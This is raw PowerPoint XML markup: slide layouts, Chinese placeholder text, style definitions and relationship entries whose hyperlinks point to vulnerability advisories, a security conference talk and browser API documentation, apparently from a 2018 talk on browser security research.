    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7475493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81</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38847454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82</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420758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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1721075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85C3DFB-4F7B-4D08-A25A-A7F556B6D9DF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1791201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44999" y="1767462"/>
            <a:ext cx="10709990" cy="3759917"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="8268"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574999" y="5672376"/>
            <a:ext cx="9449991" cy="2607442"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="3307"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="630022" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2756"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1260043" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2480"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1890065" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2205"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2520086" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2205"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3150108" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2205"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3780130" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2205"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4410151" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2205"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5040173" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2205"/>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867" y="574987"/>
            <a:ext cx="2716872" cy="91523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66250" y="574987"/>
            <a:ext cx="7993117" cy="915230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59687" y="2692444"/>
            <a:ext cx="10867490" cy="4492401"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="8268"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="859687" y="7227345"/>
            <a:ext cx="10867490" cy="2362447"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3307">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="630022" indent="0">
              <a:buNone/>
              <a:defRPr sz="2756">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1260043" indent="0">
              <a:buNone/>
              <a:defRPr sz="2480">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1890065" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2520086" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3150108" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3780130" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4410151" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5040173" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205">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66249" y="2874937"/>
            <a:ext cx="5354995" cy="6852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378744" y="2874937"/>
            <a:ext cx="5354995" cy="6852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67890" y="574990"/>
            <a:ext cx="10867490" cy="2087455"/>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67892" y="2647443"/>
            <a:ext cx="5330385" cy="1297471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3307" b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="630022" indent="0">
              <a:buNone/>
              <a:defRPr sz="2756" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1260043" indent="0">
              <a:buNone/>
              <a:defRPr sz="2480" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1890065" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2520086" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3150108" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3780130" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4410151" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5040173" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867892" y="3944914"/>
            <a:ext cx="5330385" cy="58023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78745" y="2647443"/>
            <a:ext cx="5356636" cy="1297471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3307" b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="630022" indent="0">
              <a:buNone/>
              <a:defRPr sz="2756" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1260043" indent="0">
              <a:buNone/>
              <a:defRPr sz="2480" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1890065" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2520086" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3150108" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3780130" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4410151" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5040173" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205" b="1"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6378745" y="3944914"/>
            <a:ext cx="5356636" cy="58023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67890" y="719984"/>
            <a:ext cx="4063824" cy="2519945"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4410"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356636" y="1554968"/>
            <a:ext cx="6378744" cy="7674832"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4410"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="3858"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="3307"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="2756"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="2756"/>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:defRPr sz="2756"/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr sz="2756"/>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr sz="2756"/>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:defRPr sz="2756"/>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67890" y="3239929"/>
            <a:ext cx="4063824" cy="6002369"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="630022" indent="0">
              <a:buNone/>
              <a:defRPr sz="1929"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1260043" indent="0">
              <a:buNone/>
              <a:defRPr sz="1654"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1890065" indent="0">
              <a:buNone/>
              <a:defRPr sz="1378"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2520086" indent="0">
              <a:buNone/>
              <a:defRPr sz="1378"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3150108" indent="0">
              <a:buNone/>
              <a:defRPr sz="1378"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3780130" indent="0">
              <a:buNone/>
              <a:defRPr sz="1378"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4410151" indent="0">
              <a:buNone/>
              <a:defRPr sz="1378"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5040173" indent="0">
              <a:buNone/>
              <a:defRPr sz="137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67890" y="719984"/>
            <a:ext cx="4063824" cy="2519945"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="441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356636" y="1554968"/>
            <a:ext cx="6378744" cy="7674832"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="4410"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="630022" indent="0">
              <a:buNone/>
              <a:defRPr sz="3858"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1260043" indent="0">
              <a:buNone/>
              <a:defRPr sz="3307"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1890065" indent="0">
              <a:buNone/>
              <a:defRPr sz="2756"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2520086" indent="0">
              <a:buNone/>
              <a:defRPr sz="2756"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3150108" indent="0">
              <a:buNone/>
              <a:defRPr sz="2756"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3780130" indent="0">
              <a:buNone/>
              <a:defRPr sz="2756"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4410151" indent="0">
              <a:buNone/>
              <a:defRPr sz="2756"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5040173" indent="0">
              <a:buNone/>
              <a:defRPr sz="2756"/>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867890" y="3239929"/>
            <a:ext cx="4063824" cy="6002369"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2205"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="630022" indent="0">
              <a:buNone/>
              <a:defRPr sz="1929"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1260043" indent="0">
              <a:buNone/>
              <a:defRPr sz="1654"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1890065" indent="0">
              <a:buNone/>
              <a:defRPr sz="1378"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2520086" indent="0">
              <a:buNone/>
              <a:defRPr sz="1378"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3150108" indent="0">
              <a:buNone/>
              <a:defRPr sz="1378"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3780130" indent="0">
              <a:buNone/>
              <a:defRPr sz="1378"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4410151" indent="0">
              <a:buNone/>
              <a:defRPr sz="1378"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5040173" indent="0">
              <a:buNone/>
              <a:defRPr sz="137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C4BF30A-7452-E34B-9E54-8CCFBA1533DA}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/24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CEAA9C66-7F81-D349-80F4-2645C2215A05}"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66249" y="574990"/>
            <a:ext cx="10867490" cy="208745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66249" y="2874937"/>
            <a:ext cx="10867490" cy="685235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6249" y="10009783"/>
            <a:ext cx="2834997" cy="574987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1654">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5C4BF30A-7452-E34B-9E54-8CCFBA1533DA}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/24</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173746" y="10009783"/>
            <a:ext cx="4252496" cy="574987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1654">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8898742" y="10009783"/>
            <a:ext cx="2834997" cy="574987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1654">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{CEAA9C66-7F81-D349-80F4-2645C2215A05}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1281452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260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="6063" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="315011" indent="-315011" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1378"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3858" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="945032" indent="-315011" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="689"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3307" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1575054" indent="-315011" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="689"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2756" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="2205076"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4pPr>
      <a:lvl5pPr marL="2835097"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5pPr>
      <a:lvl6pPr marL="3465119"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6pPr>
      <a:lvl7pPr marL="4095140"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7pPr>
      <a:lvl8pPr marL="4725162"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8pPr>
      <a:lvl9pPr marL="5355184" indent="-315011" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="689"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2480" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:defPPr>
        <a:defRPr lang="en-US"/>
      </a:defPPr>
      <a:lvl1pPr marL="0" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2480" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="630022" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2480" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1260043" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2480" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1890065" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2480" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2520086" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2480" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="3150108" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2480" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="3780130" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2480" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="4410151" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2480" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="5040173" algn="l" defTabSz="1260043" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2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jp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jp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75.png"/><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jpg"/><Relationship Id="rId7"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jpg"/><Relationship Id="rId7"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2.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.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2.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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7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23.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7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powerofcommunity.net/poc2017/andrew.pdf"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mailto:jin_liu@mcafee.com"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developer.mozilla.org/zh-CN/docs/learn/WebGL" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/zh-CN/docs/Web/API/Web_Audio_API"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www.zerodayinitiative.com/advisories/ZDI-18-612/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zerodayinitiative.com/advisories/ZDI-18-571/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://powerofcommunity.net/poc2017/andrew.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bbs.pediy.com/thread-211277.htm" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/zh-CN/docs/Glossary/WebRTC" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
